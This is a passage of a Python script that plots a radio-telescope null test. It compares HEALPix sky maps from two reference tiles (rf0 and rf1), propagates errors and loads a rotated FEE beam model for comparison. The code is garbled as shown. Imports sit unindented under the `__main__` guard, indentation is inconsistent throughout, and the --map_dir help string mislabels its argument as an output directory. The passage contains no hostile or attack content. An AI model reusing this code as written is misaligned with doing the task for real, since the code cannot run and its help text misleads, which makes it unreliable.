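        sub=(1, 1, 1),
        zen_angle=zen_angle,
        del_pow=del_pow,
        del_err=del_err,
        del_beam=del_beam,
        del_fit=del_fit,
        null_label="rf0 - rf1",
        beam_label="FEE model",
        fit_label="poly fit",
        ylabel=True,
        title="null test",
    )
    return fig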
if __name__ == "__main__":
import argparse
import numpy as np
from pathlib import Path
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.gridspec as gs
from mpl_toolkits.axes_grid1 import make_axes_locatable
    # NOTE: median_absolute_deviation was removed in SciPy 1.9;
    # scipy.stats.median_abs_deviation(..., scale="normal") is the modern equivalent.
    from scipy.stats import median_absolute_deviation as mad
import sys
sys.path.append("../../decode_rf_data")
sys.path.append("../../tile_maps")
from plot_tile_maps import plot_healpix
from colormap import spectral
# Custom spectral colormap
cmap = spectral()
parser = argparse.ArgumentParser(
description="""
Plot healpix map of reference data
"""
)
parser.add_argument(
"--out_dir",
metavar="\b",
default="../../../outputs/tile_maps/null_test/",
help="Output directory. Default=../../../outputs/tile_maps/null_test/",
)
parser.add_argument(
"--map_dir",
metavar="\b",
default="../../../outputs/tile_maps/tile_maps_raw/",
help="Output directory. Default=../../../outputs/tile_maps/tile_maps_raw/",
)
parser.add_argument(
"--ref_model",
metavar="\b",
default="../../../outputs/reproject_ref/ref_dipole_models.npz",
help="Healpix reference FEE model file. default=../../../outputs/reproject_ref/ref_dipole_models.npz",
)
parser.add_argument(
"--nside",
metavar="\b",
type=int,
default=32,
help="Healpix Nside. Default = 32",
)
args = parser.parse_args()
out_dir = Path(args.out_dir)
map_dir = Path(args.map_dir)
ref_model = args.ref_model
nside = args.nside
out_dir.mkdir(parents=True, exist_ok=True)
ref_tiles = [
"S35XX_rf0XX_sat_maps.npz",
"S35YY_rf0YY_sat_maps.npz",
"S35XX_rf1XX_sat_maps.npz",
"S35YY_rf1YY_sat_maps.npz",
]
good_rf0XX = rotate(
nside,
angle=+(1 * np.pi) / 4.0,
healpix_array=np.asarray(good_maps(ref_tiles[0])),
)
good_rf0YY = rotate(
nside,
angle=+(1 * np.pi) / 4.0,
healpix_array=np.asarray(good_maps(ref_tiles[1])),
)
good_rf1XX = rotate(
nside,
angle=+(1 * np.pi) / 4.0,
healpix_array=np.asarray(good_maps(ref_tiles[2])),
)
good_rf1YY = rotate(
nside,
angle=+(1 * np.pi) / 4.0,
healpix_array=np.asarray(good_maps(ref_tiles[3])),
)
# NS, EW slices of all four reference tiles
rf0XX_NS, rf0XX_EW = ref_map_slice(good_rf0XX)
rf0YY_NS, rf0YY_EW = ref_map_slice(good_rf0YY)
rf1XX_NS, rf1XX_EW = ref_map_slice(good_rf1XX)
rf1YY_NS, rf1YY_EW = ref_map_slice(good_rf1YY)
# Null test diff in power b/w rf0 & rf1
ref01_XX_NS = rf0XX_NS[0] - rf1XX_NS[0]
ref01_XX_EW = rf0XX_EW[0] - rf1XX_EW[0]
ref01_YY_NS = rf0YY_NS[0] - rf1YY_NS[0]
ref01_YY_EW = rf0YY_EW[0] - rf1YY_EW[0]
    # Error propagation in null test
error_ref01_XX_NS = np.sqrt((rf0XX_NS[1]) ** 2 + (rf1XX_NS[1]) ** 2)
error_ref01_XX_EW = np.sqrt((rf0XX_EW[1]) ** 2 + (rf1XX_EW[1]) ** 2)
error_ref01_YY_NS = np.sqrt((rf0YY_NS[1]) ** 2 + (rf1YY_NS[1]) ** 2)
error_ref01_YY_EW = np.sqrt((rf0YY_EW[1]) ** 2 + (rf1YY_EW[1]) ** 2)
# Load reference FEE model
ref_fee_model = np.load(ref_model, allow_pickle=True)
beam_XX = ref_fee_model["XX"]
beam_YY = ref_fee_model["YY"]
# Rotate beam models by pi/4 to match rotation of data
rotated_XX = rotate(nside, angle=-(1 * np.pi) / 4.0, healpix_array=beam_XX)
rotated_YY = rotate(nside, angle=-(1 * np.pi) / 4.0, healpix_array=beam_YY)
# These plots show that the pi/4 rotation was correct
# plot_healpix(data_map=rotated_XX,sub=(1,1,1), cmap=cmap, vmin=-40, vmax=-20)
# plot_healpix(data_map=rotated_YY,sub=(1,1,1), cmap=cmap, vmin=-40, vmax=-20)
# plt.show()
# slice the XX rotated map along NS, EW
XX_NS, XX_EW = slice_map(rotated_XX)
XX_NS_slice, za_NS = XX_NS
XX_EW_slice, za_EW = XX_EW
    # slice the YY rotated map along NS, EW